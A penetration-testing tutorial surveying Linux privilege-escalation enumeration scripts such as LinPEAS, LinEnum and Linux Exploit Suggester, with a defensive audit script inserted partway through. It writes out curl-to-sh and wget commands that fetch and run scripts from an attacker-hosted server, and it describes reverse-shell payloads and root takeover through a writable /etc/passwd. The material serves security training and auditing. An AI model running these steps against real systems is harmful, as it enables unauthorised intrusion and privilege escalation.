Linux Privilege Escalation: Automated Script
Contents
Introduction
Privilege Escalation Vectors
Getting Access to Linux Machine
LinPEAS
    SUID Checks
LinEnum
    Kernel and distribution release details
    Platform/software specific tests
Bashark
LES: Linux Exploit Suggester
LinuxPrivChecker
Metasploit: Local_Exploit_Suggester
Linux Private-i
Linux Smart Enumeration
Linux Exploit Suggester 2
Conclusion
Introduction
In this article, we will shed light on some of the Linux privilege escalation automated scripts that can be used to perform post-exploitation and enumeration after getting initial access on Linux-based devices.
When an attacker compromises a Linux operating system, most of the time they will get a basic shell which can be converted into a TTY shell or a Meterpreter session. This shell is limited in the actions it can perform. So, in order to elevate privileges, we need to enumerate different files, directories, permissions, logs and the /etc/passwd file. The number of files inside any Linux system is overwhelming, so doing this task manually is very difficult even when you know where to look. So, why not automate this task using scripts?
Basically, privilege escalation is a phase that comes after the attacker has compromised the victim's machine, where they try to gather critical information about the system such as hidden passwords and weakly configured services or applications. All this information helps the attacker mount a post-exploitation attack against the machine to obtain a higher-privileged shell.
Privilege Escalation Vectors
The following information is considered critical information about a Linux system:
• The version of the operating system
• Any vulnerable package installed or running
• Files and folders with full control or modify access
• Mapped drives
• Potentially interesting files
• Network information (interfaces, arp)
• Firewall status and rules
• Running processes
• Stored credentials
• Sudo rights
• Path variables
• Docker
• Buffer overflow conditions
• Cron jobs
• Capabilities
Several scripts are used in penetration testing to quickly identify potential privilege escalation vectors on Linux systems, and today we will elaborate on each script that works smoothly.
Getting Access to Linux Machine
This step is included for continuity and for beginners. If you are more of an intermediate or expert user, you can skip this and move on to the scripts directly. If you have obtained the session through any other exploit, you can also skip this section.
Since we are talking about post-exploitation, or the scripts that can be used to enumerate the conditions or openings that allow privileges to be elevated, we first need to exploit the machine. It is a pretty simple approach. First, we craft a payload using MSFvenom. Apart from the exploit, we provide our local IP address and a local port on which we expect to receive the session.
After successfully crafting the payload, we run a Python one-liner to host the payload on our port 80. We will use this to download the payload onto the target system. After downloading the payload onto the system, we start a netcat listener on the local port that we mentioned while crafting the payload. Then we execute the payload on the target machine, and we get a session on the target machine.
Refer to our MSFvenom article to learn more.
LinPEAS
GitHub Link: LinPEAS
Let's start with LinPEAS. It was created by Carlos P. The developers made it with a simple objective: to enumerate all the possible ways or methods to elevate privileges on a Linux system. One of the best things about LinPEAS is that it doesn't have any dependencies. This enables it to run anything that the pre-existing binaries support. The team tested LinPEAS on Debian, CentOS, FreeBSD, and OpenBSD. The developers designed LinPEAS in such a way that it won't write anything directly to disk and, when running with default options, it won't try to log in as another user through the su command.
The amount of time LinPEAS takes varies from 2 to 10 minutes depending on the number of checks that are requested. If you are running LinPEAS inside a Capture the Flag challenge, then don't shy away from using the -a parameter. It activates all checks. LinPEAS monitors the processes in order to find very frequent cron jobs, but in order to do this you will need to add the -a parameter, and this check will write some info inside a file that is deleted later. This makes it perfect as it does not leave a trace.
Let's talk about the other parameters.
-s (superfast & stealth): This bypasses some time-consuming checks and leaves absolutely no trace.
-P (Password): Pass a password that will be used with sudo -l and for brute-forcing other users.
-h Help banner
-o Only execute selected checks
-d <IP/NETMASK> Discover hosts using fping or ping
-p <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports using nc
It exports and unsets some environment variables during execution so that no command executed during the session is saved in the history file; if you don't want this functionality, just add the -n parameter while running it. LinPEAS can be executed directly from GitHub using the curl command.
curl [Link]scripts-suite/master/linPEAS/[Link] | sh
Here, we can see the Generic Interesting Files module of LinPEAS at work. Among other things, it also enumerates and lists the files writable by the current user and group. Here we can see that the docker group has write access. So, if we write a file by copying it to a temporary container and then back to the target destination on the host, we might be able to elevate privileges. This is possible because some privileged users write files outside a restricted file system.
Moving on, we found that there is a Python file named [Link] inside the mnt directory. It must have execution permissions, as [Link] is usually linked with a cron job. So, we can enter a shell invocation command.
SUID Checks:
Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Files that have the SUID permission run with higher privileges. Here, LinPEAS has shown us that the target machine has the SUID bit set on find, cp and nano.
LinPEAS also checks various important files for write permissions. Here, we can see that the target server has a writable /etc/passwd file. This means that an attacker can create a user and password hash on their own device and then append that user to the /etc/passwd file with root access, which compromises the device to the root level.
The next detection is for sudo permissions. This means that the current user can use the following commands with elevated access without the root password. This enables the attacker to look these binaries up in GTFOBins and find a simple one-liner to get root on the target machine.
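The three findings above (SUID binaries, a writable /etc/passwd and passwordless sudo rules, plus membership of a privileged group such as docker from the earlier module) are exactly the conditions a defender should audit for before an attacker's script reports them. The POSIX shell script below is an added example written for this article, not LinPEAS's own code: each check takes explicit paths so it can be run against a test directory or the live host, and all function names are this example's own.

```shell
#!/bin/sh
# Added example (not LinPEAS/LinEnum code): audit a host for the same
# misconfigurations the enumeration scripts flag. Every function takes
# explicit paths so it can be pointed at a test tree or at the live system.

# Print SUID and SGID regular files below a directory, one per line, sorted.
list_suid_files() {
    dir=$1
    find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Succeed (exit 0) when the file is writable by its group or by everyone,
# which is the writable /etc/passwd case shown above.
is_group_or_world_writable() {
    path=$1
    [ -n "$(find "$path" -maxdepth 0 \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]
}

# Print every group- or world-writable regular file in a directory
# (useful for /etc/cron.d, where a writable job script runs as root).
list_writable_files() {
    dir=$1
    find "$dir" -xdev -type f \( -perm -020 -o -perm -002 \) 2>/dev/null | sort
}

# Print active (non-comment) sudoers lines that grant NOPASSWD.
list_nopasswd_rules() {
    sudoers=$1
    grep -E '^[^#]*NOPASSWD' "$sudoers" 2>/dev/null || true
}

# Succeed when user $3 is listed as a member of group $2 in the
# group(5)-format file $1 (pass /etc/group for the live host).
user_in_group() {
    awk -F: -v g="$2" -v u="$3" '
        $1 == g { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] == u) found = 1 }
        END { exit found ? 0 : 1 }' "$1"
}

# Run all checks against the live host and print findings.
# Reading /etc/sudoers and /etc/shadow metadata normally requires root.
audit_host() {
    echo "[*] SUID/SGID files under /usr and /bin:"
    list_suid_files /usr
    list_suid_files /bin
    for f in /etc/passwd /etc/shadow /etc/sudoers /etc/crontab; do
        if is_group_or_world_writable "$f"; then
            echo "[!] $f is group- or world-writable"
        fi
    done
    echo "[*] Group- or world-writable cron files in /etc/cron.d:"
    list_writable_files /etc/cron.d
    echo "[*] NOPASSWD sudo rules:"
    list_nopasswd_rules /etc/sudoers
    if user_in_group /etc/group docker "$(id -un)"; then
        echo "[!] current user is a member of the docker group"
    fi
}

# The live audit only runs when invoked as: sh audit.sh --audit
if [ "${1:-}" = "--audit" ]; then
    audit_host
fi
```

Run it as `sh audit.sh --audit` (as root to cover /etc/sudoers). Anything it prints under `[!]` maps directly onto a fix: restore `/etc/passwd` to mode 0644, drop unneeded set-user-ID bits with `chmod u-s`, tighten cron scripts to root-owned 0755 or stricter, and remove NOPASSWD rules and docker group membership for accounts that do not need them. The octal `-perm -4000` / `-perm -002` forms are used instead of GNU's symbolic `-perm /u+s` so the script also runs under BusyBox and BSD find.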
In the beginning, we ran LinPEAS by taking SSH access to the target machine and then using the curl command to download and run the LinPEAS script. But there might be situations where it is not possible to follow those steps. Hence, we will transfer the script using a combination of a Python one-liner on our attacker machine and wget on the target machine.
ls
python -m SimpleHTTPServer 80
We downloaded the script into the /tmp directory as it has write permissions. Also, we must give the script execute permissions in order to run it.
cd /tmp
wget [Link]/[Link]
chmod 777 [Link]
./[Link]
LinEnum
GitHub Link: LinEnum
Time to take a look at LinEnum. It was created by Rebootuser. LinEnum is a shell script that extracts information from the target machine that is relevant to elevating privileges. It supports an experimental reporting functionality that can export the results of the scan in a readable report format. It has a few options or parameters such as:
-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-s Supply current user password to check sudo perms (INSECURE)
-r Enter report name
-h Displays help text
It checks the various resources or details mentioned below:
Kernel and distribution release details
System Information:
Hostname, networking details, current IP, default route details, DNS server information
User Information:
Current user details, last logged-on users, users currently logged onto the host, list of all users including uid/gid information, list of root accounts, extraction of password policies and hash storage method information, umask value check, check whether password hashes are stored in /etc/passwd, full details for 'default' uids such as 0, 1000, 1001 etc., attempt to read restricted files i.e. /etc/shadow, list of the current user's history files (i.e. .bash_history, .nano_history etc.), basic SSH checks
Privileged access:
Which users have recently used sudo, whether /etc/sudoers is accessible, whether the current user has sudo access without a password, whether known 'good' breakout binaries are available via sudo (i.e. nmap, vim etc.), whether root's home directory is accessible, permissions for /home/
Environmental:
Display current $PATH, display env information
Jobs/Tasks:
List all cron jobs, locate all world-writable cron jobs, locate cron jobs owned by other users of the system, list the active and inactive systemd timers
Services:
List network connections (TCP & UDP), list running processes, look up and list process binaries and associated permissions, list Netconf/inetd contents and associated binary file permissions, list init.d binary permissions
Version Information (of the following):
Sudo, MySQL, Postgres, Apache (checks user config, shows enabled modules, checks for htpasswd files, views www directories)
Default/Weak Credentials:
Checks for default/weak Postgres accounts, checks for default/weak MySQL accounts
Searches:
Locate all SUID/GUID files, locate all world-writable SUID/GUID files, locate all SUID/GUID files owned by root, locate 'interesting' SUID/GUID files (i.e. nmap, vim etc.), locate files with POSIX capabilities, list all world-writable files, find/list all accessible *.plan files and display contents, find/list all accessible *.rhosts files and display contents, show NFS server details, locate *.conf and *.log files containing the keyword supplied at script runtime, list all *.conf files located in /etc, .bak file search, locate mail
Platform/software specific tests:
Checks to determine if we're in a Docker container, checks to see if the host has Docker installed, checks to determine if we're in an LXC container
Here, we are downloading the locally hosted LinEnum script and then executing it after providing the appropriate permissions.
wget [Link]/[Link]
chmod 777 [Link]
./[Link]
We can see that it has enumerated the SUID bits on nano, cp and find.
When enumerating the cron jobs, it found the [Link] file that we discussed earlier.
It also checks for the groups with elevated accesses. In this case it is the docker group.
LinEnum also found that the /etc/passwd file is writable on the target machine.
Bashark
GitHub Link: Bashark
Time to surf with Bashark. It was created by RedCode Labs. Bashark has been designed to assist penetration testers and security researchers during the post-exploitation phase of their security assessment of a Linux, OSX or Solaris based server.
Some of the prominent features of Bashark: it is a bash script, which means it can be run directly from the terminal without any installation. It is fast and doesn't overload the target machine. It does not have any specific dependencies that you would need to install in the wild. As it wipes its presence after execution, it is difficult to detect afterwards. Here, we downloaded Bashark using the wget command from where it is locally hosted on the attacker machine. Then we gave it execute permissions using chmod and ran the Bashark script. It upgrades your shell so that it can execute different commands.
cd /tmp
wget [Link]/[Link]
chmod 777 [Link]
source [Link]
Here we used the getperm -c command to read the SUID bits on nano, cp and find among other binaries. Bashark also enumerated all the common config file paths using the getconf command.
getperm -c
getconf
LES: Linux Exploit Suggester
GitHub Link: LES
Time to get suggesting with LES. It was created by Z-Labs. As with the other scripts in this article, the developers designed this tool to help security testers or analysts test a Linux machine for potential vulnerabilities and ways to elevate privileges. The creators crafted LES in such a way that it can work across different versions or flavours of Linux. Extensive research and improvements have made the tool robust, with minimal false positives.
The basic working of LES starts with generating the initial exploit list based on the detected kernel version; it then checks the specific tags for each exploit. It collects all the positive results, ranks them according to the potential risk and then shows them to the user. We can see that the target machine is vulnerable to CVE-2021-3156, CVE-2018-18955, CVE-2019-18634, CVE-2019-15666, CVE-2017-0358 and others. Now we can read about these vulnerabilities and use them to elevate privileges on the target machine.
chmod 777 [Link]
./[Link]
LinuxPrivChecker
GitHub Link: LinuxPrivChecker
Checking some privs with LinuxPrivChecker. It was created by Mike Czumak and is maintained by Michael Contino. Let's concentrate on a Python script after the collection of shell scripts. This Python script targets Linux systems. It looks for relevant exploits, clear-text passwords, readable files and configuration errors. Additionally, it highlights some intriguing places that can elevate privileges and play a significant part. The basic system information is presented first; the kernel version, hostname, operating system, network information, running services, etc. are then displayed.
python [Link]
LinuxPrivChecker also checks the /etc/passwd file and other information such as group information or write permissions on different files of potential interest.
Metasploit: Local_Exploit_Suggester
In some cases, people who don't like to get into scripts, or those who use Metasploit to exploit the target system, end up with a Meterpreter session. In these instances, we can use a post-exploitation module to check for ways to elevate privileges, as the other scripts do. All it requires is the session identifier number of the exploited target. It lists the various vulnerabilities that the system is vulnerable to.
use post/multi/recon/local_exploit_suggester
set session 2
exploit
Linux Private-i
GitHub Link: Linux Private-i
Let's move on to Linux Private-i. It was created by creosote. Linux Private-i can be defined as a Linux enumeration or privilege escalation tool that performs the basic enumeration steps and displays the results in an easily readable format. The script has a very verbose option that includes vital checks such as OS info and permissions on common files; a search for common applications while checking versions, file permissions and possible user credentials; common apps: Apache/HTTPD, Tomcat, Netcat, Perl, Ruby, Python, WordPress, Samba; database apps: SQLite, Postgres, MySQL/MariaDB, MongoDB, Oracle, Redis, CouchDB; mail apps: Postfix, Dovecot, Exim, Squirrel Mail, Cyrus, Sendmail, Courier; networking info checks - netstat, ifconfig; basic mount info; crontab and bash history.
Here's a snippet from running the Full Scope. This box has purposely misconfigured files and permissions. We see that the target machine has a writable /etc/passwd file. We are also informed that Netcat, Perl, Python, etc. are installed on the target machine.
chmod 777 [Link]
./[Link]
Private-i also extracted the script inside the cron job that gets executed after the set duration of time.
Linux Smart Enumeration
GitHub Link: Linux Smart Enumeration
Next, let's look at Linux Smart Enumeration. Diego Blanco was the one who created it. The LinEnum script that we previously covered served as the model for the Linux Smart Enumeration script. Like all the other scripts discussed, this one has the same goal. This script provides three levels of verbosity so that the user can adjust how much information is displayed. It uses colour to distinguish between different warning types; for example, green signals that privileges on the target machine may be elevated. In order to verify sudo privileges, it asks the user whether they know the password. It examines the path variables, sudo permissions, user groups and other pertinent files.
chmod 777 [Link]
./[Link]
We can also see the [Link] file that gets re-executed again and again by the crontab. SUID files such as nano, cp, find, etc. can be used to elevate privileges. We can also see that the /etc/passwd file is writable, which can be used to create a high-privilege user and then log in to the target machine with it.
Linux Exploit Suggester 2
We discussed the Linux Exploit Suggester. Now take a look at the next-generation Linux Exploit Suggester 2. It is heavily based on the first version. There have been some niche changes that include more exploits, and it has an option to download the detected exploit code directly from Exploit-DB. It also offers more accurate wildcard matching and expands the scope of searchable exploits. Last but not least, it supports coloured output.
chmod 777 [Link]
./[Link] -k 3
Conclusion
The point that we are trying to convey through this article is that there are multiple scripts, executables and batch files to consider while doing post-exploitation on Linux-based devices. We wanted this article to serve as your go-to guide whenever you are trying to elevate privileges on a Linux machine, irrespective of the way you got your initial foothold.
To learn more about privilege escalation, follow this link.